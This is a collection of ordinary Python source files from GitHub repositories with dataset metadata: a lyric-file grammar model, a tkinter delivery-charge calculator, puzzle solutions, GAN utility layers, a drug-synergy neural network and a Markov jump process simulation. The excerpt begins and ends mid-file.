percent_second: int\n\n\nclass LyricLine(BaseModel):\n time_tags: list[TimeTag]\n lyric: Optional[str] = None\n\n\nclass InfoTag(BaseModel):\n key: str\n value: str\n\n\nclass LrcFile(BaseModel):\n info_tags: list[InfoTag]\n lyric_lines: list[LyricLine]\n\n\nTitleInfoTag = partial(InfoTag, key=\"ti\")\nArtistInfoTag = partial(InfoTag, key=\"ar\")\nAlbumInfoTag = partial(InfoTag, key=\"al\")\nByInfoTag = partial(InfoTag, key=\"by\")\nOffsetInfoTag = partial(InfoTag, key=\"offset\")\n\n\nLrcModel = metamodel_from_str(\n grammar, skipws=False, classes=[TimeTag, LyricLine, InfoTag]\n)\n\nlrc_language = LanguageDesc(\"lrc\", \"*.lrc\", \"lrc歌词文件\", metamodel=LrcModel)\n","repo_name":"SoulMelody/LibreSVIP","sub_path":"libresvip/plugins/lrc/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11579851716","text":"from tkinter import *\nfrom tkinter.scrolledtext import *\n\n\nclass DeliveryChargeCalculator:\n\n \"\"\"\n tkinter GUI that calculates delivery charges\n Accepts inputs of the length, width, height and weight of a package.\n Delivery charges are then calculated based on the inputs.\n Charges are displayed in the GUI output textbox.\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Initialises the GUI and all of it's labels, entries, buttons, scrolled text\n and radio buttons\"\"\"\n\n self._tk = Tk() # creates a GUI window\n self._tk.title('Delivery Charges Calculator') # change the title of GUI window\n self._tk.geometry('700x330') # set window size to 700*330\n\n # ===================================Top Frame==================================\n top_frame = Frame(self._tk) # add top frame to GUI window\n self._length_label = Label(top_frame, text='Length:')\n self._length_label.grid(row=0, column=0, sticky=E, padx=24)\n self._length_entry = Entry(top_frame, width=20)\n self._length_entry.grid(row=0, column=1, sticky=W)\n 
self._width_label = Label(top_frame, text='Width:')\n self._width_label.grid(row=1, column=0, sticky=E, padx=32)\n self._width_entry = Entry(top_frame, width=20)\n self._width_entry.grid(row=1, column=1, sticky=W)\n self._height_label = Label(top_frame, text='Height:')\n self._height_label.grid(row=2, column=0, sticky=E, padx=28)\n self._height_entry = Entry(top_frame, width=20)\n self._height_entry.grid(row=2, column=1, sticky=W)\n\n # ==================================Unit Frame==================================\n unit_frame = Frame(top_frame)\n self._unit_radio = IntVar()\n self._unit_radio.set(0)\n self._cm_radio = Radiobutton(unit_frame, text='cm', value=0, variable=self._unit_radio)\n self._cm_radio.grid(row=0, column=0)\n self._inch_radio = Radiobutton(unit_frame, text='inch', value=1, variable=self._unit_radio)\n self._inch_radio.grid(row=0, column=1)\n unit_frame.grid(row=3, column=1, sticky=W)\n\n # ==============================Top Frame Continue==============================\n self._space_label = Label(top_frame, text='') # empty label for spacing\n self._space_label.grid(row=4, column=1)\n\n # weight label and entry\n self._weight_label = Label(top_frame, text='Weight(kg):')\n self._weight_label.grid(row=5, column=0, sticky=E)\n self._weight_entry = Entry(top_frame, width=20)\n self._weight_entry.grid(row=5, column=1, sticky=W)\n\n # ===============================Button Frame===================================\n button_frame = Frame(top_frame)\n self._cal_button = Button(button_frame, text='Calculate Charge', command=self.calculate)\n self._cal_button.grid(row=0, column=0)\n self._clear_button = Button(button_frame, text='Clear', width=10, command=self.clear)\n self._clear_button.grid(row=0, column=1)\n button_frame.grid(row=6, column=1, sticky=EW)\n\n # ================================Scroll Text===================================\n self._output = ScrolledText(top_frame, width=95, height=10, state=DISABLED)\n self._output.grid(row=7, column=0, columnspan=2)\n\n top_frame.pack()\n\n self._tk.mainloop() # execute main loop\n\n def calculate(self):\n \"\"\"Calculates volumetric weight. 
Volumetric weight is compared with the actual weight\n Delivery charge is calculated based on the higher of the actual and volumetric weight\"\"\"\n\n actual_weight = float(self._weight_entry.get())\n leng = float(self._length_entry.get())\n wid = float(self._width_entry.get())\n ht = float(self._height_entry.get())\n vol = leng * wid * ht\n\n # Append outputs\n self._output.configure(state=NORMAL)\n self._output.insert(END, 'Next Parcel\\n')\n # check which unit is used\n if self._unit_radio.get() == 0: # cm is the chosen unit\n vol_weight = vol / 6000\n self._output.insert(END, f'{leng}cm x {wid}cm x {ht}cm = {vol}cm^3 or {vol_weight:.2f}kg\\n')\n else: # inch is the chosen unit\n vol_weight = vol / 366\n self._output.insert(END, f'{leng}inch x {wid}inch x {ht}inch = {vol}inch^3 or {vol_weight:.2f}kg\\n')\n # check which is the higher weight\n if vol_weight > actual_weight: # vol_w is larger\n used = vol_weight\n else:\n used = actual_weight\n self._output.insert(END, f'Charges based on the higher of ({vol_weight:.2f}, {actual_weight}) = {used:.2f}kg\\n')\n\n # Calculate delivery charges\n base_rate = 3\n charge = 0\n if used < 3:\n charge = 3 + base_rate\n elif used == 3 or used < 5:\n charge = 7 + base_rate\n elif used == 5 or used < 10:\n charge = 12 + base_rate\n elif used >= 10:\n charge = 30 + base_rate\n self._output.insert(END, f'Delivery Charge = ${charge:.2f}\\n')\n self._output.configure(state=DISABLED)\n\n def clear(self):\n \"\"\"\n To clear input fields after calculation.\n \"\"\"\n self._length_entry.delete(0, END)\n self._width_entry.delete(0, END)\n self._height_entry.delete(0, END)\n self._weight_entry.delete(0, END)\n self._output.configure(state=NORMAL)\n self._output.delete(1.0, END)\n self._output.configure(state=DISABLED)\n self._unit_radio.set(0)\n\n\nDeliveryChargeCalculator()\n","repo_name":"hongmei-codes/tkinter_delivery_charge","sub_path":"delivery_charge.py","file_name":"delivery_charge.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13998909538","text":"def get_position(seat_spec):\n row_spec = seat_spec[:7]\n column_spec = seat_spec[7:]\n\n row_binary = row_spec.replace(\"F\", \"0\").replace(\"B\", \"1\")\n row = int(row_binary, 2)\n\n column_binary = column_spec.replace(\"L\", \"0\").replace(\"R\", \"1\")\n column = int(column_binary, 2)\n\n return (row, column)\n\ndef get_seat_id(row, column):\n return row*8 + column\n\n\nwith open(\"input.txt\", \"r\") as f:\n lines = [line.strip() for line in f]\n\n\nresult = max([get_seat_id(*(get_position(line))) for line in lines])\nprint(result)","repo_name":"tobire42/aoc","sub_path":"2020/day-05/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148850452","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n N = int(input())\n S = []\n for i in range(N):\n s = input()\n S.append(s)\n S.sort()\n count = N\n for i in range(1, len(S)):\n if S[i - 1] == S[i]:\n count -= 1\n print(count)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc164/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9172333935","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import 
Dataset\n\nlrelu_gain = (2.0 / (1 + 0.2 ** 2)) ** 0.5\n\n\ndef weights_init(m):\n # This was taken from the PyTorch DCGAN tutorial: https://pytorch.org/tutorials/beginner/dcgan_faces_tutorial.html\n classname = m.__class__.__name__\n\n if classname.find('LinearNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('Conv2dNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n elif classname.find('Conv2dTransposeNormalizedLR') != -1:\n nn.init.normal_(m.weight.data, 0.0, 1.0)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n elif classname.find('Conv2d') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if m.bias is not None:\n nn.init.constant_(m.bias.data, 0)\n\n elif classname.find('BatchNorm') != -1:\n if m.affine:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nclass Conv2dNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, kernel_size=1, stride=1, padding=0, bias=True,\n weight_norm=False, gain=lrelu_gain):\n super().__init__()\n self.stride = stride\n self.padding = padding\n self.weight_norm = weight_norm\n self.he_constant = gain / (float(in_channels * kernel_size * kernel_size) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size, kernel_size))\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.bias = None\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=(1, 2, 3))\n x = torch.nn.functional.conv2d(inp, weight, self.bias, self.stride, self.padding)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\nclass Conv2dTransposeNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, kernel_size=1, stride=1, padding=0, bias=True,\n weight_norm=False, gain=lrelu_gain):\n super().__init__()\n self.stride = stride\n self.padding = padding\n self.weight_norm = weight_norm\n # In the ProGAN source code the kernel**2 is also included.\n # I don't understand why, since the input of conv2d transpose is 1x1 as far as I'm aware, but okay.\n self.he_constant = gain / (float(in_channels * kernel_size * kernel_size) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(in_channels, out_channels, kernel_size, kernel_size))\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=(0, 2, 3))\n x = torch.nn.functional.conv_transpose2d(inp, weight, self.bias, self.stride, self.padding)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\nclass LinearNormalizedLR(torch.nn.Module):\n def __init__(self, in_channels: int, out_channels: int, bias=True, weight_norm=False, gain=lrelu_gain):\n 
super().__init__()\n self.he_constant = gain / (float(in_channels) ** 0.5)\n\n self.weight = torch.nn.Parameter(torch.Tensor(out_channels, in_channels))\n self.weight_norm = weight_norm\n\n if bias:\n self.bias = torch.nn.Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter(\"bias\", None)\n self.reset_parameters()\n\n def forward(self, inp):\n weight = self.weight * self.he_constant\n if self.weight_norm:\n weight = apply_weight_norm(weight, input_dims=1)\n x = torch.nn.functional.linear(inp, weight, self.bias)\n return x\n\n def reset_parameters(self):\n nn.init.normal_(self.weight.data, 0.0, 1.0)\n if self.bias is not None:\n nn.init.constant_(self.bias.data, 0)\n\n\ndef local_response_normalization(x, eps=1e-8):\n \"\"\"\n Implements the variant of LRN used in ProGAN https://arxiv.org/pdf/1710.10196.pdf\n :param eps: Epsilon is a small number added to the divisor to avoid division by zero\n :param x: Output of convolutional layer (or any other tensor with channels on axis 1)\n :return: Normalized x\n \"\"\"\n divisor = (torch.pow(x, 2).mean(dim=1, keepdim=True) + eps).sqrt()\n b = x / divisor\n return b\n\n\nclass LocalResponseNorm(torch.nn.Module):\n def __init__(self, eps=1e-8):\n \"\"\"\n Implements the variant of LRN used in ProGAN https://arxiv.org/pdf/1710.10196.pdf\n :param eps: Epsilon is a small number added to the divisor to avoid division by zero\n \"\"\"\n super().__init__()\n self.eps = eps\n\n def forward(self, inp):\n return local_response_normalization(inp, self.eps)\n\n\ndef update_output_network(G_out, G, factor=0.999):\n for (p_out, p_train) in zip(G_out.parameters(), G.parameters()):\n p_out.data = p_out.data * factor + p_train.data * (1.0 - factor)\n\n\ndef save_checkpoint(folder_path, G, G_out, D, optim_G, optim_D, info_obj, enc=None, enc_opt=None):\n torch.save(\n {\n \"G\": G.state_dict(),\n \"G_out\": G_out.state_dict(),\n \"D\": D.state_dict(),\n \"optim_G\": optim_G.state_dict(),\n \"optim_D\": optim_D.state_dict(),\n \"info\": info_obj,\n \"enc\": enc.state_dict() if enc is not None else None,\n \"enc_opt\": enc_opt.state_dict() if enc_opt is not None else None,\n },\n folder_path\n )\n\n\ndef load_checkpoint(folder_path, G, G_out, D, optim_G, optim_D, enc=None, enc_opt=None):\n \"\"\"\n Loads state dict into Modules\n :param path: Path to checkpoint\n :return Info object created by other methods\n \"\"\"\n checkpoint = torch.load(folder_path)\n G.load_state_dict(checkpoint[\"G\"])\n G_out.load_state_dict(checkpoint[\"G_out\"])\n D.load_state_dict(checkpoint[\"D\"])\n optim_G.load_state_dict(checkpoint[\"optim_G\"])\n optim_D.load_state_dict(checkpoint[\"optim_D\"])\n if enc is not None:\n enc.load_state_dict(checkpoint[\"enc\"])\n if enc_opt is not None:\n enc_opt.load_state_dict(checkpoint[\"enc_opt\"])\n return checkpoint[\"info\"]\n\n\ndef apply_weight_norm(w, input_dims=(1, 2, 3), eps=1e-8):\n \"\"\"\n Applies the \"demodulation\" operation from StyleGAN2 as a form of normalization.\n :param w: Weights\n :return: Normed weights\n \"\"\"\n divisor = torch.sqrt((w ** 2).sum(dim=input_dims, keepdim=True) + eps)\n return w / divisor\n\n\nclass Reshape(torch.nn.Module):\n def __init__(self, shape):\n super().__init__()\n self.shape = shape\n\n def forward(self, x):\n return x.view(*self.shape)\n\n\nclass ToColorTransform(object):\n def __call__(self, img):\n out = torch.cat([img] * 3, dim=0)\n return out\n\n\ndef pixel_norm(x, epsilon=1e-8):\n # This function is taken from ALAE (https://github.com/podgorskiy/ALAE/)\n return x * 
torch.rsqrt(torch.mean(x.pow(2.0), dim=1, keepdim=True) + epsilon)\n\n\n\nif __name__ == \"__main__\":\n layers = [Conv2dNormalizedLR(10, 10, 3, padding=1) for i in range(10)]\n for layer in layers:\n layer.reset_parameters()\n out = torch.normal(0, 1, (100, 10, 5, 5))\n for layer in layers:\n out = torch.nn.functional.leaky_relu(layer(out), 0.2)\n print(out.mean(), out.std(dim=0).mean())\n","repo_name":"Gerryflap/progan_experiments","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38020450896","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input, concatenate, BatchNormalization, Activation\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom helper_funcs import normalize, progress\n\n\ndef data_loader(drug1_chemicals,drug2_chemicals,cell_line_gex,comb_data_name):\n print(\"File reading ...\")\n comb_data = pd.read_csv(comb_data_name, sep=\"\\t\")\n cell_line = pd.read_csv(cell_line_gex,header=None)\n chem1 = pd.read_csv(drug1_chemicals,header=None)\n chem2 = pd.read_csv(drug2_chemicals,header=None)\n synergies = np.array(comb_data[\"synergy_loewe\"])\n\n cell_line = np.array(cell_line.values)\n chem1 = np.array(chem1.values)\n chem2 = np.array(chem2.values)\n return chem1, chem2, cell_line, synergies\n\n\ndef prepare_data(chem1, chem2, cell_line, synergies, norm, train_ind_fname, val_ind_fname, test_ind_fname):\n print(\"Data normalization and preparation of train/validation/test data\")\n test_ind = list(np.loadtxt(test_ind_fname,dtype=np.int))\n val_ind = list(np.loadtxt(val_ind_fname,dtype=np.int))\n train_ind = list(np.loadtxt(train_ind_fname,dtype=np.int))\n\n train_data = {}\n val_data = {}\n test_data = {}\n train1 = np.concatenate((chem1[train_ind,:],chem2[train_ind,:]),axis=0)\n train_data['drug1'], mean1, std1, mean2, std2, feat_filt = normalize(train1, norm=norm)\n val_data['drug1'], mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(chem1[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_data['drug1'], mean1, std1, mean2, std2, feat_filt = normalize(chem1[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n train2 = np.concatenate((chem2[train_ind,:],chem1[train_ind,:]),axis=0)\n train_data['drug2'], mean1, std1, mean2, std2, feat_filt = normalize(train2, norm=norm)\n val_data['drug2'], mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(chem2[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_data['drug2'], mean1, std1, mean2, std2, feat_filt = normalize(chem2[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n\n train3 = np.concatenate((cell_line[train_ind,:],cell_line[train_ind,:]),axis=0)\n train_cell_line, mean1, std1, mean2, std2, feat_filt = normalize(train3, norm=norm)\n val_cell_line, mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(cell_line[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_cell_line, mean1, std1, mean2, std2, feat_filt = normalize(cell_line[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n train_data['drug1'] = np.concatenate((train_data['drug1'],train_cell_line),axis=1)\n train_data['drug2'] = np.concatenate((train_data['drug2'],train_cell_line),axis=1)\n\n val_data['drug1'] = 
np.concatenate((val_data['drug1'],val_cell_line),axis=1)\n    val_data['drug2'] = np.concatenate((val_data['drug2'],val_cell_line),axis=1)\n\n    test_data['drug1'] = np.concatenate((test_data['drug1'],test_cell_line),axis=1)\n    test_data['drug2'] = np.concatenate((test_data['drug2'],test_cell_line),axis=1)\n\n    train_data['y'] = np.concatenate((synergies[train_ind],synergies[train_ind]),axis=0)\n    val_data['y'] = synergies[val_ind]\n    test_data['y'] = synergies[test_ind]\n    print(test_data['drug1'].shape)\n    print(test_data['drug2'].shape)\n    return train_data, val_data, test_data\n\ndef generate_network(train, layers, inDrop, drop):\n    # fill the architecture params from dict\n    dsn1_layers = layers[\"DSN_1\"].split(\"-\")\n    dsn2_layers = layers[\"DSN_2\"].split(\"-\")\n    snp_layers = layers[\"SPN\"].split(\"-\")\n    # construct two parallel networks\n    for l in range(len(dsn1_layers)):\n        if l == 0:\n            input_drug1 = Input(shape=(train[\"drug1\"].shape[1],))\n            middle_layer = Dense(int(dsn1_layers[l]), activation='relu', kernel_initializer='he_normal')(input_drug1)\n            middle_layer = Dropout(float(inDrop))(middle_layer)\n        elif l == (len(dsn1_layers)-1):\n            dsn1_output = Dense(int(dsn1_layers[l]), activation='linear')(middle_layer)\n        else:\n            middle_layer = Dense(int(dsn1_layers[l]), activation='relu')(middle_layer)\n            middle_layer = Dropout(float(drop))(middle_layer)\n\n    for l in range(len(dsn2_layers)):\n        if l == 0:\n            input_drug2 = Input(shape=(train[\"drug2\"].shape[1],))\n            middle_layer = Dense(int(dsn2_layers[l]), activation='relu', kernel_initializer='he_normal')(input_drug2)\n            middle_layer = Dropout(float(inDrop))(middle_layer)\n        elif l == (len(dsn2_layers)-1):\n            dsn2_output = Dense(int(dsn2_layers[l]), activation='linear')(middle_layer)\n        else:\n            middle_layer = Dense(int(dsn2_layers[l]), activation='relu')(middle_layer)\n            middle_layer = Dropout(float(drop))(middle_layer)\n    \n    concatModel = concatenate([dsn1_output, dsn2_output])\n    \n    for snp_layer in range(len(snp_layers)):\n        if len(snp_layers) == 1:\n            snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(concatModel)\n            snp_output = Dense(1, activation='linear')(snpFC)\n        else:\n            # more than one FC layer at concat\n            if snp_layer == 0:\n                snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(concatModel)\n                snpFC = Dropout(float(drop))(snpFC)\n            elif snp_layer == (len(snp_layers)-1):\n                snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(snpFC)\n                snp_output = Dense(1, activation='linear')(snpFC)\n            else:\n                snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(snpFC)\n                snpFC = Dropout(float(drop))(snpFC)\n\n    model = Model([input_drug1, input_drug2], snp_output)\n    return model\n\ndef trainer(model, l_rate, train, val, epo, batch_size, earlyStop, modelName,weights):\n    cb_check = ModelCheckpoint((modelName), verbose=1, monitor='val_loss',save_best_only=True, mode='auto')\n    model.compile(loss='mean_squared_error', optimizer=keras.optimizers.Adam(lr=float(l_rate), beta_1=0.9, beta_2=0.999, amsgrad=False))\n    model.fit([train[\"drug1\"], train[\"drug2\"]], train[\"y\"], epochs=epo, shuffle=True, batch_size=batch_size,verbose=1, \n          validation_data=([val[\"drug1\"], val[\"drug2\"]], val[\"y\"]),sample_weight=weights,\n          callbacks=[EarlyStopping(monitor='val_loss', mode='auto', patience = earlyStop),cb_check])\n\n    return model\n\ndef predict(model, data):\n    pred = model.predict(data)\n    return 
pred.flatten()\n","repo_name":"hikuru/matchmaker","sub_path":"MatchMaker.py","file_name":"MatchMaker.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3205203906","text":"# Odd-parity Markov-jump process simulation\n# Reference: https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.110.050602\nimport numpy as np\n\n\ndef transition_rates(hv, hmv, fv, fmv, N=4):\n \"\"\"outputs the matrix for the dynamics of Markovian jump process with odd-parity in a N-site ring.\n Parameters: hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float, optional\n the number of sites (default: 4 )\n return : 2D array-like, of shape (2N, 2N)\n Matrix for the dynamics of a state vector [(1,v),...,(N,v),(1,-v),...,(N,-v) ]\n \"\"\"\n Mv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n Mv[i][i - 1] = hv\n\n Mmv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n Mmv[i - 1][i] = hmv\n\n OFv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n OFv[i][i] = fv\n\n OFmv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n OFmv[i][i] = fmv\n\n # Final\n result_mat = np.zeros((2 * N, 2 * N))\n\n result_mat[:N, :N] = Mv\n result_mat[N:, N:] = Mmv\n result_mat[N:, :N] = OFv\n result_mat[:N, N:] = OFmv\n for i in range(2 * N):\n result_mat[i, i] = -sum(result_mat[:, i])\n\n return result_mat\n\n\ndef jump_probs(w):\n mask = 1 - np.eye(w.shape[0])\n w = mask * w\n mean_waiting_time = 1 / np.sum(w, axis=0)[np.newaxis, :]\n return w * mean_waiting_time\n\n\ndef visit_probs(w):\n jump_probabilities = jump_probs(w)\n eigenvalues, eigenvectors = np.linalg.eig(jump_probabilities)\n max_eigen = max(eigenvalues.real)\n max_index = np.where(eigenvalues == max_eigen)\n\n visit_state = eigenvectors[:, max_index]\n if sum(visit_state) < 0:\n visit_state = -visit_state\n visit_state = visit_state / sum(visit_state)\n assert visit_state.imag.any() == 0, \"imaginary!\"\n return visit_state.real.squeeze()\n\n\ndef p_ss(hv, hmv, fv, fmv, N):\n \"\"\"outputs the steady state vector of Markovian jump process with odd-parity in a N-site ring.\n Parameters: hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n return : 1D array-like, of shape (2N)\n A state vector [(1,v),...,(N,v),(1,-v),...,(N,-v) ]\n \"\"\"\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n eigenvalues, eigenvectors = np.linalg.eig(tran_mat)\n max_eigen = max(eigenvalues.real)\n max_index = np.where(eigenvalues == max_eigen)\n\n assert int(max_eigen) == 0, \"the dynamics diverges!\"\n\n steady_state = eigenvectors[:, max_index]\n if sum(steady_state) < 0:\n steady_state = -steady_state\n steady_state = steady_state / sum(steady_state)\n assert steady_state.imag.any() == 0, \"imaginary!\"\n return steady_state.real\n\n\ndef simulation(num_trjs, trj_len, hv, hmv, fv, fmv, N, seed=0):\n \"\"\"Simulation with Gillespie algorithm of an odd-parity Markov jump process\n each trajectory has own time series\n\n Args:\n num_trjs : Number of trajectories you want\n trj_len : length of trajectories\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n 
transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n seed : seed of random generator (default: 0)\n\n Returns: 2d-array of shape (num_trjs, trj_len)\n trajectories of an odd-parity Markov jump process\n \"\"\"\n np.random.seed(seed)\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n trajs = []\n times = []\n ti = np.zeros((num_trjs,))\n p_ss_sq = np.squeeze(p_ss(hv, hmv, fv, fmv, N))\n states = np.random.choice(np.size(p_ss_sq), size=(num_trjs,), p=p_ss_sq)\n trajs.append(np.copy(states))\n times.append(ti)\n\n for i in range(trj_len - 1):\n time_interval = np.random.uniform(0.0, 1.0, size=(num_trjs, 2 * N))\n # calculates time intervals !\n for (ens_idx, dest_idx), rand_val in np.ndenumerate(time_interval):\n tran_rate = tran_mat[dest_idx, states[ens_idx]]\n if tran_rate == 0 or states[ens_idx] == dest_idx:\n time_interval[ens_idx, dest_idx] = np.nan\n else:\n time_interval[ens_idx, dest_idx] = -np.log(rand_val) / tran_rate\n update_ti = np.copy(ti)\n next_states = np.copy(states)\n for i, each_intervals in enumerate(time_interval):\n smallest_interval = np.nanmin(each_intervals)\n small_idx = np.where(each_intervals == smallest_interval)\n next_states[i] = small_idx[0]\n update_ti[i] += smallest_interval\n assert (\n len(each_intervals[small_idx]) == 1\n ), \"more than one... or none \" + str(each_intervals[small_idx])\n\n assert len(time_interval) == num_trjs, \"wrong! \" + str(len(time_interval))\n\n trajs.append(np.copy(next_states))\n times.append(np.copy(update_ti))\n states = np.copy(next_states)\n ti = np.copy(update_ti)\n\n return np.array(trajs).T, np.array(times).T\n\n\ndef ep_rate(hv, hmv, fv, fmv, N):\n \"\"\"Analytic average entropy production per step\n\n Args:\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n\n Returns:\n analytic average entropy production per step\n \"\"\"\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n stationary = p_ss(hv, hmv, fv, fmv, N)\n ent_rate = 0\n for i, prob_i in enumerate(stationary):\n for j, tr in enumerate(tran_mat[:, i]):\n tr_rev = tran_mat[i - N, j - N]\n if tr != 0 and i != j:\n ent_rate += prob_i * tr * np.log(tr / tr_rev)\n if i == j:\n ent_rate += prob_i * (tr - tr_rev)\n return ent_rate[0, 0]\n\n\ndef analytic_etpy(traj, time_traj, hv, hmv, fv, fmv, N):\n \"\"\"Analytic stochastic entropy production for given trajectories.\n this code is for simulationv2\n\n Args:\n traj : trajectories, shape=(num_trjs, trj_len)\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n\n Returns:\n 1d-array of shape (num_trjs, trj_len - 1)\n \"\"\"\n\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n mask = 1 - np.eye(tran_mat.shape[0])\n tau = 1 / np.sum(mask * tran_mat, axis=0)\n wtd = lambda t, n: np.exp(-t / tau[n]) / tau[n]\n P = jump_probs(tran_mat)\n R = visit_probs(tran_mat)\n\n waiting_time = time_traj[:, 1:] - time_traj[:, :-1]\n ent_wtd = np.log(\n wtd(waiting_time, traj[:, :-1]) / wtd(waiting_time, traj[:, :-1] - N)\n )\n ent_sys = np.log(R[traj[:, :-1]] / R[traj[:, 1:]])\n ent_aff = np.log(\n P[traj[:, 1:], 
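Note on `simulation` in the record above: it is a first-reaction sampler — it draws one exponential waiting time per candidate destination and takes the minimum. A common, equivalent alternative is the direct Gillespie method: draw a single exponential for the total exit rate, then pick the destination in proportion to its rate. A minimal sketch on an arbitrary column-form generator (same convention as `transition_rates`, but this is a generic illustration, not the module's sampler):

```python
import numpy as np

def gillespie_step(W, state, rng):
    """One direct-method step: returns (next_state, waiting_time)."""
    rates = W[:, state].copy()
    rates[state] = 0.0                     # ignore the diagonal (total exit rate)
    total = rates.sum()
    dt = rng.exponential(1.0 / total)      # waiting time ~ Exp(total rate)
    nxt = rng.choice(len(rates), p=rates / total)
    return nxt, dt

rng = np.random.default_rng(0)
W = np.array([[-1.0,  2.0],
              [ 1.0, -2.0]])
state, t = 0, 0.0
for _ in range(5):
    state, dt = gillespie_step(W, state, rng)
    t += dt
print(state, t)
```

Both samplers generate the same process in distribution; the direct method draws one random waiting time per jump instead of one per destination.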
